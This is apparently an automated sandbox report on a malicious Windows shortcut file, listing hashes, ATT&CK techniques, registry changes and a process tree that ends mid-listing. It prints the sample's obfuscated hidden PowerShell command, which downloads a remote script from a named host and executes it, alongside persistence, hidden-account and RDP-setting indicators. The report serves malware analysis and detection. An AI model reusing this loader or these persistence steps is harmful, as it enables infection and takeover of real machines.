c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2024 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk
Size

2KB
MD5

4a658619a07a5237c0e85b75bf14e644
SHA1

089a04cc3a66c5b86ddbb6a481c5ab8702c1e621
SHA256

c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177
SHA512

88e0b970b2da52b263ecd6008a58df1094ce1acac03bd1358afad0d99daa6c3f89c32122451a3f6632f42db70541b3982ecaff046eda569968ed6ffd2879a394

Score

9^/10

defense_evasion discovery execution lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4252	net1.exe
1364	net.exe
2456	net1.exe
4128	net.exe

Blocklisted process makes network request 28 IoCs

flow	pid	Process
6	4160	powershell.exe
7	4160	powershell.exe
18	4160	powershell.exe
24	4620	powershell.exe
32	4620	powershell.exe
36	4620	powershell.exe
37	4620	powershell.exe
51	4620	powershell.exe
52	4620	powershell.exe
53	4620	powershell.exe
54	4620	powershell.exe
55	4620	powershell.exe
58	4620	powershell.exe
59	4620	powershell.exe
60	4620	powershell.exe
62	4620	powershell.exe
63	4620	powershell.exe
64	4620	powershell.exe
68	4620	powershell.exe
69	4620	powershell.exe
70	4620	powershell.exe
71	4620	powershell.exe
72	4620	powershell.exe
73	4620	powershell.exe
74	4620	powershell.exe
75	4620	powershell.exe
76	4620	powershell.exe
77	4620	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4620	powershell.exe
1460	powershell.exe
3856	powershell.exe
4160	powershell.exe
4736	powershell.exe
264	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
4228	net1.exe
4232	net.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk	powershell.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\sysmon2.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon2.bat	cmd.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\System32\sysmon.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon.bat	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\_BootUEFI_ = "0"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1596	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Terminal Server Client	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Terminal Server Client\AuthenticationLevelOverride = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2728	schtasks.exe
1548	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4160	powershell.exe
4160	powershell.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3856	powershell.exe
3856	powershell.exe
4160	powershell.exe
4736	powershell.exe
4736	powershell.exe
1460	powershell.exe
1460	powershell.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
4160	powershell.exe
4160	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	4160	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeIncreaseQuotaPrivilege	1460	powershell.exe
Token: SeSecurityPrivilege	1460	powershell.exe
Token: SeTakeOwnershipPrivilege	1460	powershell.exe
Token: SeLoadDriverPrivilege	1460	powershell.exe
Token: SeSystemProfilePrivilege	1460	powershell.exe
Token: SeSystemtimePrivilege	1460	powershell.exe
Token: SeProfSingleProcessPrivilege	1460	powershell.exe
Token: SeIncBasePriorityPrivilege	1460	powershell.exe
Token: SeCreatePagefilePrivilege	1460	powershell.exe
Token: SeBackupPrivilege	1460	powershell.exe
Token: SeRestorePrivilege	1460	powershell.exe
Token: SeShutdownPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeSystemEnvironmentPrivilege	1460	powershell.exe
Token: SeRemoteShutdownPrivilege	1460	powershell.exe
Token: SeUndockPrivilege	1460	powershell.exe
Token: SeManageVolumePrivilege	1460	powershell.exe
Token: 33	1460	powershell.exe
Token: 34	1460	powershell.exe
Token: 35	1460	powershell.exe
Token: 36	1460	powershell.exe
Token: SeIncreaseQuotaPrivilege	1460	powershell.exe
Token: SeSecurityPrivilege	1460	powershell.exe
Token: SeTakeOwnershipPrivilege	1460	powershell.exe
Token: SeLoadDriverPrivilege	1460	powershell.exe
Token: SeSystemProfilePrivilege	1460	powershell.exe
Token: SeSystemtimePrivilege	1460	powershell.exe
Token: SeProfSingleProcessPrivilege	1460	powershell.exe
Token: SeIncBasePriorityPrivilege	1460	powershell.exe
Token: SeCreatePagefilePrivilege	1460	powershell.exe
Token: SeBackupPrivilege	1460	powershell.exe
Token: SeRestorePrivilege	1460	powershell.exe
Token: SeShutdownPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeSystemEnvironmentPrivilege	1460	powershell.exe
Token: SeRemoteShutdownPrivilege	1460	powershell.exe
Token: SeUndockPrivilege	1460	powershell.exe
Token: SeManageVolumePrivilege	1460	powershell.exe
Token: 33	1460	powershell.exe
Token: 34	1460	powershell.exe
Token: 35	1460	powershell.exe
Token: 36	1460	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe
3864	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 4160	1088	cmd.exe	84
PID 1088 wrote to memory of 4160	1088	cmd.exe	84
PID 4160 wrote to memory of 3864	4160	powershell.exe	85
PID 4160 wrote to memory of 3864	4160	powershell.exe	85
PID 4160 wrote to memory of 3864	4160	powershell.exe	85
PID 4160 wrote to memory of 3856	4160	powershell.exe	91
PID 4160 wrote to memory of 3856	4160	powershell.exe	91
PID 4160 wrote to memory of 2244	4160	powershell.exe	94
PID 4160 wrote to memory of 2244	4160	powershell.exe	94
PID 2244 wrote to memory of 4736	2244	cmd.exe	96
PID 2244 wrote to memory of 4736	2244	cmd.exe	96
PID 2244 wrote to memory of 3628	2244	cmd.exe	97
PID 2244 wrote to memory of 3628	2244	cmd.exe	97
PID 2244 wrote to memory of 1056	2244	cmd.exe	98
PID 2244 wrote to memory of 1056	2244	cmd.exe	98
PID 2244 wrote to memory of 2728	2244	cmd.exe	99
PID 2244 wrote to memory of 2728	2244	cmd.exe	99
PID 2244 wrote to memory of 5060	2244	cmd.exe	100
PID 2244 wrote to memory of 5060	2244	cmd.exe	100
PID 2756 wrote to memory of 8	2756	cmd.exe	103
PID 2756 wrote to memory of 8	2756	cmd.exe	103
PID 2756 wrote to memory of 4664	2756	cmd.exe	104
PID 2756 wrote to memory of 4664	2756	cmd.exe	104
PID 4160 wrote to memory of 1460	4160	powershell.exe	105
PID 4160 wrote to memory of 1460	4160	powershell.exe	105
PID 2756 wrote to memory of 1548	2756	cmd.exe	107
PID 2756 wrote to memory of 1548	2756	cmd.exe	107
PID 2756 wrote to memory of 1812	2756	cmd.exe	108
PID 2756 wrote to memory of 1812	2756	cmd.exe	108
PID 4084 wrote to memory of 1036	4084	cmd.exe	111
PID 4084 wrote to memory of 1036	4084	cmd.exe	111
PID 1036 wrote to memory of 468	1036	net.exe	112
PID 1036 wrote to memory of 468	1036	net.exe	112
PID 4084 wrote to memory of 2484	4084	cmd.exe	113
PID 4084 wrote to memory of 2484	4084	cmd.exe	113
PID 2484 wrote to memory of 2204	2484	net.exe	114
PID 2484 wrote to memory of 2204	2484	net.exe	114
PID 4084 wrote to memory of 1224	4084	cmd.exe	115
PID 4084 wrote to memory of 1224	4084	cmd.exe	115
PID 1224 wrote to memory of 1828	1224	net.exe	116
PID 1224 wrote to memory of 1828	1224	net.exe	116
PID 4084 wrote to memory of 1364	4084	cmd.exe	117
PID 4084 wrote to memory of 1364	4084	cmd.exe	117
PID 1364 wrote to memory of 2456	1364	net.exe	118
PID 1364 wrote to memory of 2456	1364	net.exe	118
PID 4084 wrote to memory of 4128	4084	cmd.exe	119
PID 4084 wrote to memory of 4128	4084	cmd.exe	119
PID 4128 wrote to memory of 4252	4128	net.exe	120
PID 4128 wrote to memory of 4252	4128	net.exe	120
PID 4084 wrote to memory of 4232	4084	cmd.exe	121
PID 4084 wrote to memory of 4232	4084	cmd.exe	121
PID 4232 wrote to memory of 4228	4232	net.exe	122
PID 4232 wrote to memory of 4228	4232	net.exe	122
PID 4084 wrote to memory of 3004	4084	cmd.exe	123
PID 4084 wrote to memory of 3004	4084	cmd.exe	123
PID 4084 wrote to memory of 3408	4084	cmd.exe	124
PID 4084 wrote to memory of 3408	4084	cmd.exe	124
PID 4084 wrote to memory of 3940	4084	cmd.exe	125
PID 4084 wrote to memory of 3940	4084	cmd.exe	125
PID 4084 wrote to memory of 2768	4084	cmd.exe	126
PID 4084 wrote to memory of 2768	4084	cmd.exe	126
PID 4084 wrote to memory of 872	4084	cmd.exe	127
PID 4084 wrote to memory of 872	4084	cmd.exe	127
PID 4084 wrote to memory of 3192	4084	cmd.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command &{$ty = 'dvn7d#Jt' + 'Bdj*cjU' + 'bn^v45F' + 'hjw#dhC' + 'ghi576_f#Ky' + 'jh9fKJ'; [string] $aCmd = {(New-xwzObject Nxwzetxwz.WebCxwzlient).DoxwzwnlxwzoadxwzStrxwzinxwzg('ht' + 'tp:/' + '/paxwzn' + 'axwzkxwzeosxwz' + 'xwz.icxwzu/scxwzripxwzts/scxwz-inxwzt' + 'exwzrmexwzdiatxwze.xwzpsxwz1')}; $rCmd = $aCmd.replace('xwz', ''); $finalExec = iex $rCmd; iex $finalExec; }
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Report_Estimiation_SKT_20241112472075939.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3864
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      PID:4716
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9359D61221ACC5733735C2787ADE8EC1 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1808
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FE12FE10E79E7360BDE1254C5F8B78E1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FE12FE10E79E7360BDE1254C5F8B78E1 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3656
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1F451EF867938E065D988DA6D46954BA --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:532
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=999D884ED9E2BE2BBC6651675B3320FF --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
